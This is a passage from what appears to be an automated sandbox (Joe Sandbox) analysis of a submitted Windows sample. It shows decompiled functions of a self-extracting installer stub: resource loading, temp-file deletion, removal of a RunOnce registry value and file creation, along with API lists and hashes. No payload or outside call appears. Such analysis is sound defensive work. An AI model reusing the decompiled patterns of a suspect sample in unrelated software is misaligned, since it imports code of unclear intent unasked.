                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0xa49124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0xa49124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A444B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A42F4D,?,00000002,00000000), ref: 00A45201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A45250
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                              • Part of subcall function 00A46285: GetLastError.KERNEL32(00A45BBC), ref: 00A46285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: 19ce20d04ed375f89bbcb16b2738079ca9477156c76c2a9ccd5fa999489dda2f
                                                                                                                                                                                                                                            • Instruction ID: 0c4a43fc79eab3a083db93130b0af847c18232d6a24f7d87726431f6bd19d3f2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19ce20d04ed375f89bbcb16b2738079ca9477156c76c2a9ccd5fa999489dda2f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F11104BDA41601BBE354ABF55D49F7B61ADEBDA381F10442EF602E6192DBFA8C024124
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E00A452B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0xa491e0; // 0x2ec8390
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0xa48a24 == 0 &&  *0xa49a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0xa48a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0xa48a24 == 0 &&  *0xa49a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E00A41781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            					if(( *0xa49a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E00A465E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E00A42390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0xa48a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0xa49a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E00A41FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0xa48a20 =  *0xa48a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E00A46CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(02EC8390,00000080,?,00000000), ref: 00A452F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(02EC8390), ref: 00A452FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(02EC8390,?,00000000), ref: 00A45305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(02EC8390), ref: 00A4530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00A411FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A45363
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A45334
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 2833751637-2312194364
                                                                                                                                                                                                                                            • Opcode ID: 317fd7bfce6a3e05abf32eab5a8038cedd96c90d82f65ac091dab409a2143d84
                                                                                                                                                                                                                                            • Instruction ID: e687417a7ca743933a02b1587c4ffc75fabe7e4d6ba4b7acd80248879a829bf0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 317fd7bfce6a3e05abf32eab5a8038cedd96c90d82f65ac091dab409a2143d84
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A721F33D900604DBCB70EFA4ED19B6A37B4BBD2784F040129E4425A6A1CFF66C86CB41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A41FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0xa48530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A4538C,?,?,00A4538C), ref: 00A42005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(00A4538C,wextract_cleanup0,?,?,00A4538C), ref: 00A42017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00A4538C,?,?,00A4538C), ref: 00A42020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 849931509-702805525
                                                                                                                                                                                                                                            • Opcode ID: 14cdab8e366d3a8ea54cc515ed243b472bbf04b9d2f057c518879c52ab7a55c8
                                                                                                                                                                                                                                            • Instruction ID: 09b6a01cf85b3fbcb4fa035a178e3005a1c4458a8d1b3f12240345e03a8441c9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14cdab8e366d3a8ea54cc515ed243b472bbf04b9d2f057c518879c52ab7a55c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4E04F3C694318BBE721DBD0FC0AF5D7B69F7D1741F100194B905A0061EB665E15D716
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A44CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
	int _t30;
	long _t32;
	signed int _t33;
	long _t35;
	long _t36;
	struct HWND__* _t37;
	long _t38;
	long _t39;
	long _t41;
	long _t44;
	long _t45;
	long _t46;
	signed int _t50;
	long _t51;
	char* _t58;
	long _t59;
	char* _t63;
	long _t64;
	CHAR* _t71;
	CHAR* _t74;
	int _t75;
	signed int _t76;

	_t69 = __edx;
	_t29 =  *0xa48004; // 0x173b1603
	_t30 = _t29 ^ _t76;
	_v8 = _t30;
	_t75 = _a8;
	if( *0xa491d8 == 0) {
		_t32 = _a4;
		__eflags = _t32;
		if(_t32 == 0) {
			_t33 = E00A44E99(_t75);
			L35:
			return E00A46CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
		}
		_t35 = _t32 - 1;
		__eflags = _t35;
		if(_t35 == 0) {
			L9:
			_t33 = 0;
			goto L35;
		}
		_t36 = _t35 - 1;
		__eflags = _t36;
		if(_t36 == 0) {
			_t37 =  *0xa48584; // 0x0
			__eflags = _t37;
			if(_t37 != 0) {
				SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
			}
			_t54 = 0xa491e4;
			_t58 = 0xa491e4;
			do {
				_t38 =  *_t58;
				_t58 =  &(_t58[1]);
				__eflags = _t38;
			} while (_t38 != 0);
			_t59 = _t58 - 0xa491e5;
			__eflags = _t59;
			_t71 =  *(_t75 + 4);
			_t73 =  &(_t71[1]);
			do {
				_t39 =  *_t71;
				_t71 =  &(_t71[1]);
				__eflags = _t39;
			} while (_t39 != 0);
			_t69 = _t71 - _t73;
			_t30 = _t59 + 1 + _t71 - _t73;
			__eflags = _t30 - 0x104;
			if(_t30 >= 0x104) {
				L3:
				_t33 = _t30 | 0xffffffff;
				goto L35;
			}
			_t69 = 0xa491e4;
			_t30 = E00A44702( &_v268, 0xa491e4,  *(_t75 + 4));
			__eflags = _t30;
			if(__eflags == 0) {
				goto L3;
			}
			_t41 = E00A4476D( &_v268, __eflags);
			__eflags = _t41;
			if(_t41 == 0) {
				goto L9;
			}
			_push(0x180);
			_t30 = E00A44980( &_v268, 0x8302); // executed
			_t75 = _t30;
			__eflags = _t75 - 0xffffffff;
			if(_t75 == 0xffffffff) {
				goto L3;
			}
			_t30 = E00A447E0( &_v268);
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			}
			 *0xa493f4 =  *0xa493f4 + 1;
			_t33 = _t75;
			goto L35;
		}
		_t44 = _t36 - 1;
		__eflags = _t44;
		if(_t44 == 0) {
			_t54 = 0xa491e4;
			_t63 = 0xa491e4;
			do {
				_t45 =  *_t63;
				_t63 =  &(_t63[1]);
				__eflags = _t45;
			} while (_t45 != 0);
			_t74 =  *(_t75 + 4);
			_t64 = _t63 - 0xa491e5;
			__eflags = _t64;
			_t69 =  &(_t74[1]);
			do {
				_t46 =  *_t74;
				_t74 =  &(_t74[1]);
				__eflags = _t46;
			} while (_t46 != 0);
			_t73 = _t74 - _t69;
			_t30 = _t64 + 1 + _t74 - _t69;
			__eflags = _t30 - 0x104;
			if(_t30 >= 0x104) {
				goto L3;
			}
			_t69 = 0xa491e4;
			_t30 = E00A44702( &_v268, 0xa491e4,  *(_t75 + 4));
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			}
			_t69 =  *((intOrPtr*)(_t75 + 0x18));
			_t30 = E00A44C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			}
			E00A44B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E00A44B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                            0x00a44d5d
                                                                                                                                                                                                                                            0x00a44d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44d67
                                                                                                                                                                                                                                            0x00a44d6f
                                                                                                                                                                                                                                            0x00a44d74
                                                                                                                                                                                                                                            0x00a44d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44d7c
                                                                                                                                                                                                                                            0x00a44d84
                                                                                                                                                                                                                                            0x00a44d89
                                                                                                                                                                                                                                            0x00a44d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44d94
                                                                                                                                                                                                                                            0x00a44d99
                                                                                                                                                                                                                                            0x00a44d9e
                                                                                                                                                                                                                                            0x00a44da1
                                                                                                                                                                                                                                            0x00a44daa
                                                                                                                                                                                                                                            0x00a44daa
                                                                                                                                                                                                                                            0x00a44da3
                                                                                                                                                                                                                                            0x00a44da3
                                                                                                                                                                                                                                            0x00a44da3
                                                                                                                                                                                                                                            0x00a44db5
                                                                                                                                                                                                                                            0x00a44dbb
                                                                                                                                                                                                                                            0x00a44dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44dc3
                                                                                                                                                                                                                                            0x00a44dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44dc5
                                                                                                                                                                                                                                            0x00a44dbd
                                                                                                                                                                                                                                            0x00a44d2a
                                                                                                                                                                                                                                            0x00a44d2a
                                                                                                                                                                                                                                            0x00a44d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44d2d
                                                                                                                                                                                                                                            0x00a44cf8
                                                                                                                                                                                                                                            0x00a44cfd
                                                                                                                                                                                                                                            0x00a44d02
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A44DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A44DDD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 3625706803-2312194364
                                                                                                                                                                                                                                            • Opcode ID: 3c87f237eaaa6065cfca28d657f041df9747b202d00ef8b405f877b3e14aff33
                                                                                                                                                                                                                                            • Instruction ID: 8289bc8ae095f592c532f6224ce2f310b125ea1b62fa9122ca5ae9a8599da598
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c87f237eaaa6065cfca28d657f041df9747b202d00ef8b405f877b3e14aff33
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B941053EA005019BCB259F38DD447F677A5EBCE304F144668D88697685DF32DE46C750
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A44C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0xa48d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0xa48d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32 ref: 00A44C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A44C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A44C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: 8197dec82b5c24fd4590fd7f95ca95057bef35acd54b6240e2ebff17ffb8b43a
                                                                                                                                                                                                                                            • Instruction ID: a446cac00959fd78aaff6487da647e2669c6a63416440a4d7382cc8d839206ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8197dec82b5c24fd4590fd7f95ca95057bef35acd54b6240e2ebff17ffb8b43a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF0907EA0120CAFAB64DFB4DC88EBB77ADEB99241B48052AA815C1050EA31D914C7A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A4487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A4490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A44A23,?,00A44F67,*MEMCAB,00008000,00000180), ref: 00A448DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A44F67,*MEMCAB,00008000,00000180), ref: 00A44902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
